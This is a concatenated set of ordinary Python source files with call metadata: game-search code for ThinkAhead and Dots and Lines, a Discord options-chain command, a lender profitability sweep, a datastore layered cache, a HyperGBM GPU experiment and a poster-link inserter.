board=[[nan, nan, nan],
[3, 9, nan],
[2, nan, 1]],
label='losein2'
)
losein2.maxDepth = 3
# http://www.kongregate.com/games/zolli/thinkahead-brain-trainer
stolen = GameState(
to_move='H',
position=(3, 1),
board=[[3, 8, 9, 5],
[9, 1, 3, 2],
[8, 6, 4, 4],
[9, nan, 1, 5]],
label='stolen'
)
choose1 = GameState(
to_move='H',
position=(1, 0),
board=[[3, 8, 9, 5],
[nan, 1, 3, 2],
[8, 6, 4, 4],
[nan, nan, 1, 5]],
label='choose1'
)
winby10 = GameState(
to_move='H',
position=(2, 0),
board=[[nan, nan, nan, nan],
[nan, nan, nan, nan],
[nan, 6, 4, 5],
[nan, nan, 1, 3]],
label='winby10'
)
thinkA = ThinkAhead(stolen)
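# Quick illustration (added; not in the original script): exercise the game
# API on the 'stolen' position. actions() yields moves highest-value first,
# and utility() is the player-relative score.
best_first = thinkA.actions(stolen)[0]           # (3, 0, 9): take the 9
after_first = thinkA.result(stolen, best_first)
assert thinkA.utility(after_first, 'H') == 9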
def availableMoves(board):
sides = ['T', 'B', 'L', 'R']
moves = PriorityQueue()
for row in range(0, len(board)):
for col in range(0, len(board)):
if board[row][col]['winner'] == '':
for side in sides:
if side not in board[row][col]['lines']:
moves.put((row, col, side))
moveList = []
while not moves.empty():
moveList.append(moves.get(1))
return moveList
def applyMove(board, size, row, col, side, currMover):
board[row][col]['lines'].append(side)
if row <= size - 1 and row != 0 and side == 'T':
board[row - 1][col]['lines'].append('B')
if row >= 0 and row != size - 1 and side == 'B':
board[row + 1][col]['lines'].append('T')
if col <= size - 1 and col != 0 and side == 'L':
board[row][col - 1]['lines'].append('R')
if col >= 0 and col != size - 1 and side == 'R':
board[row][col + 1]['lines'].append('L')
sides = ['T', 'B', 'L', 'R']
complete = True
for side in sides:
if side in board[row][col]['lines']:
continue
complete = False
if complete:
board[row][col]['winner'] = currMover
return board
def countScore(board):
scores = {'A': 0, 'B': 0}
for row in range(0, len(board)):
for col in range(0, len(board)):
if board[row][col]['winner'] == 'A':
scores['A'] += 1
if board[row][col]['winner'] == 'B':
scores['B'] += 1
return scores
board = '''
***
***
***
'''
def printDotsBoard(board):
board_string = ''
for row in range(0, len(board)):
for col in range(0, len(board[row])):
board_string += '*'
if 'T' in board[row][col]['lines']:
board_string += '---'
else:
board_string += ' '
if col == len(board[row]) - 1:
board_string += '*\n'
for space in range(0, len(board[row])):
if 'L' in board[row][space]['lines']:
board_string += '| '
else:
board_string += ' '
if '' != board[row][space]['winner']:
board_string += board[row][space]['winner']
else:
board_string += ' '
if space == len(board[row]) - 1 and 'R' in board[row][space]['lines']:
board_string += ' |'
else:
board_string += ' '
board_string += '\n'
if row == len(board) - 1:
for col in range(0, len(board[row])):
board_string += '*'
if 'B' in board[row][col]['lines']:
board_string += '---'
else:
board_string += ' '
board_string += '*'
print(board_string)
class DotLineState:
    def __init__(self, to_move, board, label=None, scores=None):
        self.to_move = to_move
        self.board = board
        self.label = label
        # build a fresh dict per instance to avoid the shared-mutable-default pitfall
        self.scores = {'A': 0, 'B': 0} if scores is None else scores
def __str__(self):
if self.label is None:
return super(DotLineState, self).__str__()
return self.label
class DotsAndLines(Game):
"""
An implementation of Dots and Lines
"""
def __init__(self, state):
self.initial = state
self.size = len(state.board)
def actions(self, state):
"Legal moves are any square not yet taken."
moves = availableMoves(state.board)
return moves
# defines the order of play
def opponent(self, player):
if player == 'A':
return 'B'
if player == 'B':
return 'A'
return None
def result(self, state, move):
row, col, side = move
currMover = state.to_move
nextMover = self.opponent(currMover)
newState = deepcopy(state)
newState.to_move = nextMover
newState.board = applyMove(newState.board, self.size, row, col, side, currMover)
newState.scores = countScore(newState.board)
return newState
def utility(self, state, player):
"Player relative score"
opponent = self.opponent(player)
return state.scores[player] - state.scores[opponent]
def terminal_test(self, state):
"A state is terminal if it is won or there are no empty squares."
return len(self.actions(state)) == 0
def display(self, state):
# print_table(state.board, njust='center', sep=',')
printDotsBoard(state.board)
print('Score: ' + str(state.scores))
'''
Board represents the squares, whether the top, bottom, left, and
right have been filled, and which player owns the square.
'''
dotLineBoard = [[{'winner': 'A', 'lines': ['T', 'B', 'L', 'R']}, {'winner': 'A', 'lines': ['T', 'B', 'L', 'R']}],
[{'winner': 'A', 'lines': ['T', 'B', 'L', 'R']}, {'winner': 'B', 'lines': ['T', 'B', 'L', 'R']}]]
won = DotLineState(board=dotLineBoard, to_move='A', label='Won', scores={'A': 3, 'B': 1})
dotLineBoard = [[{'winner': 'A', 'lines': ['T', 'B', 'L', 'R']}, {'winner': 'B', 'lines': ['T', 'B', 'L', 'R']}],
[{'winner': 'B', 'lines': ['T', 'B', 'L', 'R']}, {'winner': 'B', 'lines': ['T', 'B', 'L', 'R']}]]
lost = DotLineState(board=dotLineBoard, to_move='A', label='Lost', scores={'A': 1, 'B': 3})
dotLineBoard = [[{'winner': 'A', 'lines': ['T', 'B', 'L', 'R']}, {'winner': 'B', 'lines': ['T', 'B', 'L', 'R']}],
[{'winner': 'A', 'lines': ['T', 'B', 'L', 'R']}, {'winner': 'B', 'lines': ['T', 'B', 'L', 'R']}]]
tied = DotLineState(board=dotLineBoard, to_move='A', label='Tied', scores={'A': 2, 'B': 2})
dotLineBoard = [[{'winner': 'A', 'lines': ['T', 'B', 'L', 'R']}, {'winner': 'A', 'lines': ['T', 'B', 'L', 'R']}],
[{'winner': 'A', 'lines': ['T', 'B', 'L', 'R']}, {'winner': '', 'lines': ['T', 'L']}]]
winin1Dots = DotLineState(board=dotLineBoard, to_move='A', label='Win in 1', scores={'A': 2, 'B': 1})
dotLineBoard = [[{'winner': '', 'lines': ['L', 'R']}, {'winner': '', 'lines': ['T', 'L']}, {'winner': '', 'lines': ['R']}],
[{'winner': '', 'lines': ['L', 'R']}, {'winner': '', 'lines': ['L', 'R']}, {'winner': '', 'lines': ['L', 'R']}],
[{'winner': '', 'lines': ['B', 'L', 'R']}, {'winner': '', 'lines': ['L', 'B']}, {'winner': '', 'lines': ['B', 'R']}],
]
winIn5_3x3 = DotLineState(board=dotLineBoard, to_move='A', label='Win in 5', scores={'A': 0, 'B': 0})
play = DotLineState(
board=[[{'winner': '', 'lines': []}, {'winner': '', 'lines': []}],
[{'winner': '', 'lines': []}, {'winner': '', 'lines': []}]],
to_move='A', label='Start')
#amended by whh
dotLine = DotsAndLines(play)
#dotLine = DotsAndLines(winIn5_3x3)
myGames = {
dotLine: [
won,
lost,
tied,
winin1Dots,
winIn5_3x3,
play
]
}
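# Illustrative snippet (added): one move on the empty 2x2 board using the
# DotsAndLines API defined above.
first_edge = dotLine.actions(play)[0]            # lexicographically first: (0, 0, 'B')
one_move_in = dotLine.result(play, first_edge)
assert one_move_in.scores == {'A': 0, 'B': 0}    # no box is completed yet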
| [((44, 13, 44, 28), 'queue.PriorityQueue', 'PriorityQueue', ({}, {}), '()', False, 'from queue import PriorityQueue\n'), ((56, 13, 56, 28), 'queue.PriorityQueue', 'PriorityQueue', ({}, {}), '()', False, 'from queue import PriorityQueue\n'), ((211, 12, 211, 27), 'queue.PriorityQueue', 'PriorityQueue', ({}, {}), '()', False, 'from queue import PriorityQueue\n'), ((47, 11, 47, 24), 'math.isnan', 'isnan', ({(47, 17, 47, 23): 'row[c]'}, {}), '(row[c])', False, 'from math import nan, isnan\n'), ((58, 11, 58, 29), 'math.isnan', 'isnan', ({(58, 17, 58, 28): 'board[r][c]'}, {}), '(board[r][c])', False, 'from math import nan, isnan\n'), ((100, 19, 100, 34), 'copy.deepcopy', 'deepcopy', ({(100, 28, 100, 33): 'state'}, {}), '(state)', False, 'from copy import deepcopy\n'), ((117, 8, 117, 57), 'grading.util.print_table', 'print_table', (), '', False, 'from grading.util import print_table\n'), ((341, 19, 341, 34), 'copy.deepcopy', 'deepcopy', ({(341, 28, 341, 33): 'state'}, {}), '(state)', False, 'from copy import deepcopy\n')] |
minhhoang1023/GamestonkTerminal | discordbot/stocks/options/opt_chain.py | 195dc19b491052df080178c0cc6a9d535a91a704 | import os
import df2img
import disnake
import numpy as np
import pandas as pd
from menus.menu import Menu
from PIL import Image
import discordbot.config_discordbot as cfg
from discordbot.config_discordbot import gst_imgur, logger
from discordbot.helpers import autocrop_image
from gamestonk_terminal.stocks.options import yfinance_model
async def chain_command(
ctx,
ticker: str = None,
expiry: str = None,
opt_type: str = None,
min_sp: float = None,
max_sp: float = None,
):
"""Show calls/puts for given ticker and expiration"""
try:
# Debug
if cfg.DEBUG:
logger.debug(
"opt-chain %s %s %s %s %s", ticker, expiry, opt_type, min_sp, max_sp
)
# Check for argument
if not ticker:
raise Exception("Stock ticker is required")
dates = yfinance_model.option_expirations(ticker)
if not dates:
raise Exception("Stock ticker is invalid")
options = yfinance_model.get_option_chain(ticker, str(expiry))
calls_df = options.calls
puts_df = options.puts
column_map = {"openInterest": "oi", "volume": "vol", "impliedVolatility": "iv"}
columns = [
"strike",
"bid",
"ask",
"volume",
"openInterest",
"impliedVolatility",
]
if opt_type == "Calls":
df = calls_df[columns].rename(columns=column_map)
if opt_type == "Puts":
df = puts_df[columns].rename(columns=column_map)
min_strike = np.percentile(df["strike"], 1)
max_strike = np.percentile(df["strike"], 100)
if min_sp:
min_strike = min_sp
if max_sp:
max_strike = max_sp
        if min_sp is not None and max_sp is not None and min_sp > max_sp:
            # swap the filter bounds, not the raw arguments
            min_strike, max_strike = max_strike, min_strike
df = df[df["strike"] >= min_strike]
df = df[df["strike"] <= max_strike]
df["iv"] = pd.to_numeric(df["iv"].astype(float))
formats = {"iv": "{:.2f}"}
for col, f in formats.items():
df[col] = df[col].map(lambda x: f.format(x)) # pylint: disable=W0640
df.set_index("strike", inplace=True)
title = f"Stocks: {opt_type} Option Chain for {ticker.upper()} on {expiry} [yfinance]"
embeds: list = []
# Weekly Calls Pages
i, i2, end = 0, 0, 20
df_pg = []
embeds_img = []
dindex = len(df.index)
while i < dindex:
df_pg = df.iloc[i:end]
figp = df2img.plot_dataframe(
df_pg,
fig_size=(1000, (40 + (40 * 20))),
col_width=[3, 3, 3, 3],
tbl_cells=dict(
height=35,
),
font=dict(
family="Consolas",
size=20,
),
template="plotly_dark",
paper_bgcolor="rgba(0, 0, 0, 0)",
)
imagefile = f"opt-chain{i}.png"
df2img.save_dataframe(fig=figp, filename=imagefile)
image = Image.open(imagefile)
image = autocrop_image(image, 0)
image.save(imagefile, "PNG", quality=100)
uploaded_image = gst_imgur.upload_image(imagefile, title="something")
image_link = uploaded_image.link
embeds_img.append(
f"{image_link}",
)
embeds.append(
disnake.Embed(
title=title,
colour=cfg.COLOR,
),
)
i2 += 1
i += 20
end += 20
os.remove(imagefile)
# Author/Footer
for i in range(0, i2):
embeds[i].set_author(
name=cfg.AUTHOR_NAME,
url=cfg.AUTHOR_URL,
icon_url=cfg.AUTHOR_ICON_URL,
)
embeds[i].set_footer(
text=cfg.AUTHOR_NAME,
icon_url=cfg.AUTHOR_ICON_URL,
)
i = 0
for i in range(0, i2):
embeds[i].set_image(url=embeds_img[i])
i += 1
embeds[0].set_footer(text=f"Page 1 of {len(embeds)}")
options = [
disnake.SelectOption(label="Home", value="0", emoji="🟢"),
]
await ctx.send(embed=embeds[0], view=Menu(embeds, options))
except Exception as e:
embed = disnake.Embed(
title="ERROR Stock-Options: Expirations",
colour=cfg.COLOR,
description=e,
)
embed.set_author(
name=cfg.AUTHOR_NAME,
icon_url=cfg.AUTHOR_ICON_URL,
)
await ctx.send(embed=embed, delete_after=30.0)
| [((36, 16, 36, 57), 'gamestonk_terminal.stocks.options.yfinance_model.option_expirations', 'yfinance_model.option_expirations', ({(36, 50, 36, 56): 'ticker'}, {}), '(ticker)', False, 'from gamestonk_terminal.stocks.options import yfinance_model\n'), ((60, 21, 60, 51), 'numpy.percentile', 'np.percentile', ({(60, 35, 60, 47): "df['strike']", (60, 49, 60, 50): '1'}, {}), "(df['strike'], 1)", True, 'import numpy as np\n'), ((61, 21, 61, 53), 'numpy.percentile', 'np.percentile', ({(61, 35, 61, 47): "df['strike']", (61, 49, 61, 52): '100'}, {}), "(df['strike'], 100)", True, 'import numpy as np\n'), ((28, 12, 30, 13), 'discordbot.config_discordbot.logger.debug', 'logger.debug', ({(29, 16, 29, 42): '"""opt-chain %s %s %s %s %s"""', (29, 44, 29, 50): 'ticker', (29, 52, 29, 58): 'expiry', (29, 60, 29, 68): 'opt_type', (29, 70, 29, 76): 'min_sp', (29, 78, 29, 84): 'max_sp'}, {}), "('opt-chain %s %s %s %s %s', ticker, expiry, opt_type, min_sp,\n max_sp)", False, 'from discordbot.config_discordbot import gst_imgur, logger\n'), ((107, 12, 107, 63), 'df2img.save_dataframe', 'df2img.save_dataframe', (), '', False, 'import df2img\n'), ((108, 20, 108, 41), 'PIL.Image.open', 'Image.open', ({(108, 31, 108, 40): 'imagefile'}, {}), '(imagefile)', False, 'from PIL import Image\n'), ((109, 20, 109, 44), 'discordbot.helpers.autocrop_image', 'autocrop_image', ({(109, 35, 109, 40): 'image', (109, 42, 109, 43): '0'}, {}), '(image, 0)', False, 'from discordbot.helpers import autocrop_image\n'), ((112, 29, 112, 81), 'discordbot.config_discordbot.gst_imgur.upload_image', 'gst_imgur.upload_image', (), '', False, 'from discordbot.config_discordbot import gst_imgur, logger\n'), ((126, 12, 126, 32), 'os.remove', 'os.remove', ({(126, 22, 126, 31): 'imagefile'}, {}), '(imagefile)', False, 'import os\n'), ((147, 12, 147, 71), 'disnake.SelectOption', 'disnake.SelectOption', (), '', False, 'import disnake\n'), ((153, 16, 157, 9), 'disnake.Embed', 'disnake.Embed', (), '', False, 'import disnake\n'), ((118, 16, 121, 17), 'disnake.Embed', 'disnake.Embed', (), '', False, 'import disnake\n'), ((150, 45, 150, 66), 'menus.menu.Menu', 'Menu', ({(150, 50, 150, 56): 'embeds', (150, 58, 150, 65): 'options'}, {}), '(embeds, options)', False, 'from menus.menu import Menu\n')] |
xujiahuayz/premfin | scripts/get_lenderprofit.py | 0e90d876ef7c9ef4f3da7d4842b8ec5ae9ac7e68 | #%% import packages
import numpy as np
import pandas as pd
import multiprocessing
from time import time
import json
from premiumFinance.constants import (
MORTALITY_TABLE_CLEANED_PATH,
PROCESSED_PROFITABILITY_PATH,
)
from premiumFinance.financing import calculate_lender_profit, yield_curve
mortality_experience = pd.read_excel(MORTALITY_TABLE_CLEANED_PATH)
#%% calculate profit rate
def get_average_profitability(
is_level_premium=True,
lapse_assumption=True,
policyholder_rate=yield_curve,
statutory_interest=0.035,
premium_markup=0.0,
cash_interest=0.001,
lender_coc=0.01,
data_frame=mortality_experience,
):
profit_columns = data_frame.apply(
lambda row: calculate_lender_profit(
row=row,
is_level_premium=is_level_premium,
lapse_assumption=lapse_assumption,
policyholder_rate=policyholder_rate,
statutory_interest=statutory_interest,
premium_markup=premium_markup,
cash_interest=cash_interest,
lender_coc=lender_coc,
),
axis=1,
result_type="expand",
)
data_frame[["Breakeven Loan rate", "Lender profit"]] = profit_columns
data_frame["Dollar profit"] = (
data_frame["Lender profit"] * data_frame["Amount Exposed"]
)
average_profitability = (
data_frame["Dollar profit"].sum() / data_frame["Amount Exposed"].sum()
)
return average_profitability, data_frame
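def demo_single_scenario(coc=0.05):
    """Illustrative helper (added; not in the original script): one pass of
    the profitability calculation for a single lender cost-of-capital."""
    avg_profit, detailed = get_average_profitability(lender_coc=coc)
    print(f"average lender profitability at coc={coc}: {avg_profit:.4f}")
    return detailed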
def tempfunc_t(x):
a, _ = get_average_profitability(lender_coc=x, lapse_assumption=True)
return a
def tempfunc_f(x):
a, _ = get_average_profitability(lender_coc=x, lapse_assumption=False)
return a
lender_coc_value = np.arange(start=0.01, stop=0.2, step=0.01)
#%% sweep lender cost of capital and cache profitability results
if __name__ == "__main__":
pool = multiprocessing.Pool()
start_time = time()
foo = []
for tempfunc in (tempfunc_t, tempfunc_f):
foo.append(
pool.map(
tempfunc,
lender_coc_value,
)
)
print(f"it took {time() - start_time}")
lender_profitability = {
"lender_coc": lender_coc_value.tolist(),
"profitability": foo,
}
with open(PROCESSED_PROFITABILITY_PATH, "w") as outfile:
json.dump(lender_profitability, outfile)
| [((15, 23, 15, 66), 'pandas.read_excel', 'pd.read_excel', ({(15, 37, 15, 65): 'MORTALITY_TABLE_CLEANED_PATH'}, {}), '(MORTALITY_TABLE_CLEANED_PATH)', True, 'import pandas as pd\n'), ((64, 19, 64, 61), 'numpy.arange', 'np.arange', (), '', True, 'import numpy as np\n'), ((69, 11, 69, 33), 'multiprocessing.Pool', 'multiprocessing.Pool', ({}, {}), '()', False, 'import multiprocessing\n'), ((71, 17, 71, 23), 'time.time', 'time', ({}, {}), '()', False, 'from time import time\n'), ((86, 8, 86, 48), 'json.dump', 'json.dump', ({(86, 18, 86, 38): 'lender_profitability', (86, 40, 86, 47): 'outfile'}, {}), '(lender_profitability, outfile)', False, 'import json\n'), ((29, 20, 38, 9), 'premiumFinance.financing.calculate_lender_profit', 'calculate_lender_profit', (), '', False, 'from premiumFinance.financing import calculate_lender_profit, yield_curve\n'), ((80, 21, 80, 27), 'time.time', 'time', ({}, {}), '()', False, 'from time import time\n')] |
BearerPipelineTest/catapult | dashboard/dashboard/common/layered_cache.py | 3800a67cd916200046a50748893bbd0dcf3d7f4a | # Copyright 2018 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Caches processed query results in memcache and datastore.
Memcache is not very reliable for the perf dashboard. Prometheus team explained
that memcache is LRU and shared between multiple applications, so their activity
may result in our data being evicted. To prevent this, we cache processed
query results in the data store. Using NDB, the values are also cached in
memcache if possible. This improves performance because doing a get()
for a key which has a single BlobProperty is much quicker than a complex query
over a large dataset.
(Background: http://g/prometheus-discuss/othVtufGIyM/wjAS5djyG8kJ)
When an item is cached, layered_cache does the following:
1) Namespaces the key based on whether datastore_hooks says the request is
internal_only.
2) Pickles the value (memcache does this internally), and adds a data store
entity with the key and a BlobProperty with the pickled value.
Retrieving values checks memcache via NDB first, and if datastore is used it
unpickles.
When an item is removed from the the cache, it is removed from both internal and
external caches, since removals are usually caused by large changes that affect
both caches.
Although this module contains ndb.Model classes, these are not intended
to be used directly by other modules.
"""
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import six.moves.cPickle as cPickle
import datetime
import logging
from google.appengine.api import datastore_errors
from google.appengine.runtime import apiproxy_errors
from google.appengine.ext import ndb
from dashboard.common import datastore_hooks
from dashboard.common import namespaced_stored_object
from dashboard.common import stored_object
class CachedPickledString(ndb.Model):
value = ndb.BlobProperty()
expire_time = ndb.DateTimeProperty()
@classmethod
def NamespacedKey(cls, key, namespace):
return ndb.Key(cls.__name__,
namespaced_stored_object.NamespaceKey(key, namespace))
@classmethod
def GetExpiredKeys(cls):
"""Gets keys of expired entities.
Returns:
List of keys for items which are expired.
"""
current_time = datetime.datetime.now()
query = cls.query(cls.expire_time < current_time)
query = query.filter(cls.expire_time != None)
return query.fetch(keys_only=True)
def Get(key):
"""Gets the value from the datastore."""
if key is None:
return None
namespaced_key = namespaced_stored_object.NamespaceKey(key)
entity = ndb.Key('CachedPickledString',
namespaced_key).get(read_policy=ndb.EVENTUAL_CONSISTENCY)
if entity:
return cPickle.loads(entity.value)
return stored_object.Get(key)
def GetExternal(key):
"""Gets the value from the datastore for the externally namespaced key."""
if key is None:
return None
namespaced_key = namespaced_stored_object.NamespaceKey(
key, datastore_hooks.EXTERNAL)
entity = ndb.Key('CachedPickledString',
namespaced_key).get(read_policy=ndb.EVENTUAL_CONSISTENCY)
if entity:
return cPickle.loads(entity.value)
return stored_object.Get(key)
def Set(key, value, days_to_keep=None, namespace=None):
"""Sets the value in the datastore.
Args:
key: The key name, which will be namespaced.
value: The value to set.
days_to_keep: Number of days to keep entity in datastore, default is None.
Entity will not expire when this value is 0 or None.
namespace: Optional namespace, otherwise namespace will be retrieved
using datastore_hooks.GetNamespace().
"""
# When number of days to keep is given, calculate expiration time for
# the entity and store it in datastore.
# Once the entity expires, it will be deleted from the datastore.
expire_time = None
if days_to_keep:
expire_time = datetime.datetime.now() + datetime.timedelta(
days=days_to_keep)
namespaced_key = namespaced_stored_object.NamespaceKey(key, namespace)
try:
CachedPickledString(
id=namespaced_key, value=cPickle.dumps(value),
expire_time=expire_time).put()
except datastore_errors.BadRequestError as e:
logging.warning('BadRequestError for key %s: %s', key, e)
except apiproxy_errors.RequestTooLargeError as e:
stored_object.Set(key, value)
def SetExternal(key, value, days_to_keep=None):
"""Sets the value in the datastore for the externally namespaced key.
Needed for things like /add_point that update internal/external data at the
same time.
Args:
key: The key name, which will be namespaced as externally_visible.
value: The value to set.
days_to_keep: Number of days to keep entity in datastore, default is None.
Entity will not expire when this value is 0 or None.
"""
Set(key, value, days_to_keep, datastore_hooks.EXTERNAL)
@ndb.synctasklet
def Delete(key):
"""Clears the value from the datastore."""
yield DeleteAsync(key)
@ndb.tasklet
def DeleteAsync(key):
unnamespaced_future = stored_object.DeleteAsync(key)
# See the comment in stored_object.DeleteAsync() about this get().
entities = yield ndb.get_multi_async([
CachedPickledString.NamespacedKey(key, datastore_hooks.INTERNAL),
CachedPickledString.NamespacedKey(key, datastore_hooks.EXTERNAL),
])
keys = [entity.key for entity in entities if entity]
yield (unnamespaced_future, ndb.delete_multi_async(keys))
def DeleteAllExpiredEntities():
"""Deletes all expired entities from the datastore."""
ndb.delete_multi(CachedPickledString.GetExpiredKeys())
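def _example_usage():
  """Illustrative only (added for clarity; not part of the original module).

  Shows the call pattern described in the module docstring. Assumes an App
  Engine context where NDB is available; key name and payload are made up.
  """
  Set('recent_results', {'rows': [1, 2, 3]}, days_to_keep=7)
  cached = Get('recent_results')  # NDB/memcache first, else datastore + unpickle
  assert cached == {'rows': [1, 2, 3]}
  Delete('recent_results')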
| [((49, 10, 49, 28), 'google.appengine.ext.ndb.BlobProperty', 'ndb.BlobProperty', ({}, {}), '()', False, 'from google.appengine.ext import ndb\n'), ((50, 16, 50, 38), 'google.appengine.ext.ndb.DateTimeProperty', 'ndb.DateTimeProperty', ({}, {}), '()', False, 'from google.appengine.ext import ndb\n'), ((74, 19, 74, 61), 'dashboard.common.namespaced_stored_object.NamespaceKey', 'namespaced_stored_object.NamespaceKey', ({(74, 57, 74, 60): 'key'}, {}), '(key)', False, 'from dashboard.common import namespaced_stored_object\n'), ((79, 9, 79, 31), 'dashboard.common.stored_object.Get', 'stored_object.Get', ({(79, 27, 79, 30): 'key'}, {}), '(key)', False, 'from dashboard.common import stored_object\n'), ((86, 19, 87, 36), 'dashboard.common.namespaced_stored_object.NamespaceKey', 'namespaced_stored_object.NamespaceKey', ({(87, 6, 87, 9): 'key', (87, 11, 87, 35): 'datastore_hooks.EXTERNAL'}, {}), '(key, datastore_hooks.EXTERNAL)', False, 'from dashboard.common import namespaced_stored_object\n'), ((92, 9, 92, 31), 'dashboard.common.stored_object.Get', 'stored_object.Get', ({(92, 27, 92, 30): 'key'}, {}), '(key)', False, 'from dashboard.common import stored_object\n'), ((113, 19, 113, 72), 'dashboard.common.namespaced_stored_object.NamespaceKey', 'namespaced_stored_object.NamespaceKey', ({(113, 57, 113, 60): 'key', (113, 62, 113, 71): 'namespace'}, {}), '(key, namespace)', False, 'from dashboard.common import namespaced_stored_object\n'), ((148, 24, 148, 54), 'dashboard.common.stored_object.DeleteAsync', 'stored_object.DeleteAsync', ({(148, 50, 148, 53): 'key'}, {}), '(key)', False, 'from dashboard.common import stored_object\n'), ((64, 19, 64, 42), 'datetime.datetime.now', 'datetime.datetime.now', ({}, {}), '()', False, 'import datetime\n'), ((78, 11, 78, 38), 'six.moves.cPickle.loads', 'cPickle.loads', ({(78, 25, 78, 37): 'entity.value'}, {}), '(entity.value)', True, 'import six.moves.cPickle as cPickle\n'), ((91, 11, 91, 38), 'six.moves.cPickle.loads', 'cPickle.loads', ({(91, 25, 91, 37): 'entity.value'}, {}), '(entity.value)', True, 'import six.moves.cPickle as cPickle\n'), ((55, 19, 55, 72), 'dashboard.common.namespaced_stored_object.NamespaceKey', 'namespaced_stored_object.NamespaceKey', ({(55, 57, 55, 60): 'key', (55, 62, 55, 71): 'namespace'}, {}), '(key, namespace)', False, 'from dashboard.common import namespaced_stored_object\n'), ((75, 11, 76, 34), 'google.appengine.ext.ndb.Key', 'ndb.Key', ({(75, 19, 75, 40): '"""CachedPickledString"""', (76, 19, 76, 33): 'namespaced_key'}, {}), "('CachedPickledString', namespaced_key)", False, 'from google.appengine.ext import ndb\n'), ((88, 11, 89, 34), 'google.appengine.ext.ndb.Key', 'ndb.Key', ({(88, 19, 88, 40): '"""CachedPickledString"""', (89, 19, 89, 33): 'namespaced_key'}, {}), "('CachedPickledString', namespaced_key)", False, 'from google.appengine.ext import ndb\n'), ((111, 18, 111, 41), 'datetime.datetime.now', 'datetime.datetime.now', ({}, {}), '()', False, 'import datetime\n'), ((111, 44, 112, 26), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n'), ((120, 4, 120, 61), 'logging.warning', 'logging.warning', ({(120, 20, 120, 52): '"""BadRequestError for key %s: %s"""', (120, 54, 120, 57): 'key', (120, 59, 120, 60): 'e'}, {}), "('BadRequestError for key %s: %s', key, e)", False, 'import logging\n'), ((122, 4, 122, 33), 'dashboard.common.stored_object.Set', 'stored_object.Set', ({(122, 22, 122, 25): 'key', (122, 27, 122, 32): 'value'}, {}), '(key, value)', False, 'from dashboard.common import stored_object\n'), ((155, 30, 155, 58), 'google.appengine.ext.ndb.delete_multi_async', 'ndb.delete_multi_async', ({(155, 53, 155, 57): 'keys'}, {}), '(keys)', False, 'from google.appengine.ext import ndb\n'), ((117, 33, 117, 53), 'six.moves.cPickle.dumps', 'cPickle.dumps', ({(117, 47, 117, 52): 'value'}, {}), '(value)', True, 'import six.moves.cPickle as cPickle\n')]
BigAndSweet/HyperGBM | hypergbm/tests/cuml_/run_experiment_cuml.py | f3bc4e0d877b82a264d35158f9bc974f43a2a5ee | # -*- coding:utf-8 -*-
"""
"""
import cudf
from hypergbm import make_experiment
from hypernets.tabular import get_tool_box
from hypernets.tabular.datasets import dsutils
def main(target='y', dtype=None, max_trials=3, drift_detection=False, clear_cache=True, **kwargs):
tb = get_tool_box(cudf.DataFrame)
assert isinstance(tb, type) and tb.__name__ == 'CumlToolBox'
print("preparing...")
df = dsutils.load_bank()
if dtype is not None:
df[target] = df[target].astype(dtype)
df, = tb.from_local(df)
assert isinstance(df, cudf.DataFrame)
df_train, df_test = tb.train_test_split(df, test_size=0.5, random_state=123)
X_test = df_test
y_test = X_test.pop(target)
exp = make_experiment(df_train, target=target,
test_data=X_test.copy(),
max_trials=max_trials,
drift_detection=drift_detection,
clear_cache=clear_cache,
**kwargs)
print('experiment:', f'{[s.name for s in exp.steps]}', 'random_state', exp.random_state)
print("training...")
estimator = exp.run()
print('estimator pipeline:', f'{[s[0] for s in estimator.steps]}')
print("scoring...")
y_pred = estimator.predict(X_test)
y_proba = estimator.predict_proba(X_test)
task = exp.task
if task == 'regression':
metrics = ['mse', 'mae', 'msle', 'rmse', 'r2']
else:
metrics = ['auc', 'accuracy', 'f1', 'recall']
result = tb.metrics.calc_score(y_test, y_pred, y_proba, task=task, metrics=metrics,
pos_label=kwargs.get('pos_label', None))
print(result)
return exp, estimator
if __name__ == '__main__':
main(target='y', reward_metric='auc', ensemble_size=10, pos_label='yes', log_level='info', max_trials=10)
# main(target='y', max_trials=10, cv=False, ensemble_size=0, verbose=0, pos_label='yes', )
# main(target='day', reward_metric='f1', ensemble_size=10, log_level='info', max_trials=5)
# main(target='day', dtype='str', reward_metric='f1', ensemble_size=0, log_level='info', max_trials=6)
# main(target='age', dtype='float', ensemble_size=10, log_level='info', max_trials=8)
| [((14, 9, 14, 37), 'hypernets.tabular.get_tool_box', 'get_tool_box', ({(14, 22, 14, 36): 'cudf.DataFrame'}, {}), '(cudf.DataFrame)', False, 'from hypernets.tabular import get_tool_box\n'), ((18, 9, 18, 28), 'hypernets.tabular.datasets.dsutils.load_bank', 'dsutils.load_bank', ({}, {}), '()', False, 'from hypernets.tabular.datasets import dsutils\n')] |
DarthSpector/Poster-Adder | Inserter.py | 97a86338987dd8cbcdf56414f53932c0370dcfc2 | def pictureInserter(og,address,list):
j=0
for i in og:
file1 = open(address+'/'+i, "a")
x="\ncover::https://image.tmdb.org/t/p/original/"+list[j]
file1.writelines(x)
file1.close()
j=j+1
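if __name__ == '__main__':
    # Hypothetical example (file names and poster IDs are made up): append
    # one TMDB cover line to each listed file in the current directory.
    pictureInserter(["movie1.txt", "movie2.txt"], ".",
                    ["abc123.jpg", "def456.jpg"])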
| [] |